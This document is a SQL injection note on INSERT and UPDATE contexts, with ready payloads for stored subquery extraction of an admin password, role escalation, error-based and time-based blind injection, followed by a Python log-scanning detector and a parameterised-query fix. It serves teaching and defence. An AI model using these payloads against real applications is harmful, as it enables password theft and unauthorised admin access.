🧠 SQLi Context - INSERT and UPDATE

Exploitation

The “Stored” Extraction

If the application allows you to view the data you just submitted (like your own profile page), you can inject a subquery. The database will evaluate your subquery and save the secret data as your profile information.

-- 1. UPDATE Context (Modifying another column)
-- Structure: UPDATE users SET email = '{input}' WHERE id = 1
-- Goal: Overwrite your 'bio' or 'description' with the admin's password.
test@mail.com', bio = (SELECT password FROM users WHERE username='admin')--

-- 2. INSERT Context (Injecting into the next column)
-- Structure: INSERT INTO users (username, bio) VALUES ('{input}', 'default')
-- Goal: Place the subquery in the position of the second column.
test_user', (SELECT password FROM users WHERE username='admin'))--

Privilege Escalation

If you know the name of the role or privilege column, you can append it to the SET clause to grant yourself admin rights.

-- Structure: UPDATE users SET email = '{input}' WHERE id = 1
-- Goal: Append a modification to the role column.
hacker@mail.com', role = 'admin', is_admin = 1--

SQLi - Error-based

If the application does not reflect your input back to you but does show database errors, force an error whose message leaks the data.

-- 1. UPDATE Context
-- Structure: UPDATE users SET email = '{input}' WHERE id = 1
test', email = EXTRACTVALUE(1, CONCAT(0x7e, ({query})))--

-- 2. INSERT Context
-- Structure: INSERT INTO users (username, email) VALUES ('{input}', 'default')
test', EXTRACTVALUE(1, CONCAT(0x7e, ({query}))))--

SQLi - Time-based Blind

If the injection is entirely blind (no errors, no reflected data), fall back to time delays.

-- 1. UPDATE Context (MySQL)
-- Structure: UPDATE users SET email = '{input}' WHERE id = 1
test', email = IF((SUBSTRING(@@version,1,1)='5'), SLEEP(5), 'test')--

-- 2. INSERT Context (MySQL)
-- Structure: INSERT INTO users (username, email) VALUES ('{input}', 'default')
test', IF((SUBSTRING(@@version,1,1)='5'), SLEEP(5), 'test'))--
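Detection side of the three techniques above (stored subquery, error-based, time-based). This is an added example, not part of the original note: it scans MySQL general-query-log style lines and flags UPDATE/INSERT statements that carry those shapes. The log lines are constructed, and the line layout (timestamp, thread id, `Query`, statement, tab-separated) is an assumption about the log format.

```python
"""Flag UPDATE/INSERT statements in query-log lines that show the injection
shapes from the note: a subquery inside SET/VALUES, EXTRACTVALUE/UPDATEXML
error leaks, SLEEP/BENCHMARK delays, and a '--' that comments out the
application's own trailing SQL. Added example; log lines are constructed."""
import re

# Constructed sample lines in an assumed general-log layout:
# <timestamp>\t<thread id> Query\t<statement>
SAMPLE_LOG = [
    "2024-03-01T10:00:00.000000Z\t   7 Query\tUPDATE users SET email = 'bob@example.com' WHERE id = 7",
    "2024-03-01T10:00:01.000000Z\t   8 Query\tUPDATE users SET email = 'test@mail.com', "
    "bio = (SELECT password FROM users WHERE username='admin')-- ' WHERE id = 8",
    "2024-03-01T10:00:02.000000Z\t   9 Query\tINSERT INTO users (username, email) VALUES ('test', "
    "EXTRACTVALUE(1, CONCAT(0x7e, (SELECT @@version))))-- ', 'default')",
    "2024-03-01T10:00:03.000000Z\t  10 Query\tUPDATE users SET email = "
    "IF((SUBSTRING(@@version,1,1)='5'), SLEEP(5), 'test')-- ' WHERE id = 10",
    "2024-03-01T10:00:04.000000Z\t  11 Query\tSELECT id FROM users WHERE username = 'carol'",
]

LOG_RE = re.compile(r"^\S+\t\s*(\d+) Query\t(.*)$")

# Rule name -> pattern. Order determines the order of names in a finding.
RULES = [
    # A subquery placed inside a SET or VALUES list ("stored" extraction).
    ("stored-subquery", re.compile(r"\b(SET|VALUES)\b.*\(\s*SELECT\b", re.I | re.S)),
    # XML functions abused to put data into an error message.
    ("error-based", re.compile(r"\b(EXTRACTVALUE|UPDATEXML)\s*\(", re.I)),
    # Delay primitives used for time-based blind inference.
    ("time-based", re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I)),
    # A '-- ' comment with SQL still after it: the application's own tail
    # (e.g. the WHERE clause) has been commented out.
    ("commented-tail", re.compile(r"--\s.*\S", re.S)),
]


def parse_line(line):
    """Return (thread_id, statement) or None for lines that are not queries."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return int(m.group(1)), m.group(2)


def flag_statement(sql):
    """Names of every rule that matches the statement text."""
    return [name for name, rx in RULES if rx.search(sql)]


def scan_log(lines):
    """(thread_id, [rule names]) for each statement that triggers a rule."""
    findings = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        thread_id, sql = parsed
        hits = flag_statement(sql)
        if hits:
            findings.append((thread_id, hits))
    return findings


if __name__ == "__main__":
    for thread_id, hits in scan_log(SAMPLE_LOG):
        print(f"thread {thread_id}: {', '.join(hits)}")
```

Thread 7 and 11 are ordinary traffic and produce nothing; the other three each trip the rule for their technique plus `commented-tail`, which is the most general signal here because every payload on this page relies on commenting out the statement the application appended.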

Mitigation

Fix: Use Prepared Statements. Ensure that parameters are bound strictly to values and never used to dynamically construct column names in SET clauses.
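The fix in code, as an added example that is not part of the original note: the same UPDATE built once by string interpolation and once with a bound parameter, run against an in-memory SQLite table so it works offline. Because a column name cannot be a bound parameter, the safe version checks any caller-chosen column against an allowlist before it is spliced into the SET clause. The table, rows, and the `UPDATABLE_COLUMNS` allowlist are constructed for the example.

```python
"""Unsafe vs. parameterised UPDATE. Added example with a constructed schema;
the payload is the note's UPDATE-context stored-extraction string."""
import sqlite3

# The note's UPDATE payload, used as the value a user submits for 'email'.
PAYLOAD = "test@mail.com', bio = (SELECT password FROM users WHERE username='admin')--"

# Columns a user is allowed to change about themselves (constructed allowlist).
UPDATABLE_COLUMNS = frozenset({"email", "bio"})


def make_db():
    """Fresh in-memory database with two constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, "
        "email TEXT, bio TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?, ?, ?)",
        [
            (1, "alice", "alice-secret", "alice@example.com", "hi", "user"),
            (2, "admin", "admin-secret", "admin@example.com", "root", "admin"),
        ],
    )
    conn.commit()
    return conn


def update_email_vulnerable(conn, user_id, new_email):
    # BAD: the value becomes part of the statement text, so a quote in it
    # ends the literal and the rest is parsed as SQL.
    conn.execute(f"UPDATE users SET email = '{new_email}' WHERE id = {user_id}")
    conn.commit()


def is_updatable(column):
    """Only exact allowlisted column names may reach the SET clause."""
    return column in UPDATABLE_COLUMNS


def update_column_safe(conn, user_id, column, value):
    # The column name is validated (it cannot be bound); the value and the
    # row id are bound, so the driver never treats them as SQL.
    if not is_updatable(column):
        raise ValueError(f"column not updatable: {column}")
    conn.execute(f"UPDATE users SET {column} = ? WHERE id = ?", (value, user_id))
    conn.commit()


def row(conn, user_id):
    """(email, bio, role) for one user."""
    return conn.execute(
        "SELECT email, bio, role FROM users WHERE id = ?", (user_id,)
    ).fetchone()


if __name__ == "__main__":
    db = make_db()
    update_email_vulnerable(db, 1, PAYLOAD)
    print("vulnerable:", row(db, 1))   # bio now holds the admin password

    db = make_db()
    update_column_safe(db, 1, "email", PAYLOAD)
    print("safe:", row(db, 1))         # payload stored literally, bio untouched
```

In the vulnerable path the `--` also removes the application's `WHERE id = 1`, so every row is rewritten, not just the caller's; that is the same trait the detection rule for a commented-out tail keys on. In the safe path the whole payload is stored as the literal email value and an attempt to update `role` is refused before any SQL is built.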
